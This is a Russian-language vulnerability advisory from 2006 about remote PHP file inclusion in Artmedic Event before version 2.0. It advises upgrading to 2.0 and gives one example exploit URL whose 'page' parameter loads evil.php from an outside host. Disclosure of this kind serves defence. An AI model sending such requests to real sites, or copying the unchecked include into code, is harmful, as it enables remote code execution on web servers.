PHP-инклюдинг в Artmedic Event

Дата публикации:
02.05.2006
Дата изменения:
17.10.2006
Всего просмотров:
3915
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Artmedic Event
Уязвимые версии: Artmedic Event версии до 2.0.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "page" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Пример:

http://target.de/event/index.php?page=http://host/evil.php

URL производителя: www.artmedic-phpscripts.de/index.php?page=338434555&f=1&i=734394556&s=338434555

Решение: Установите последнюю версию (2.0) с сайта производителя.

Ссылки: Remote Code Execution in Artmedic Event and Artmedic HPMaker

или введите имя

CAPTCHA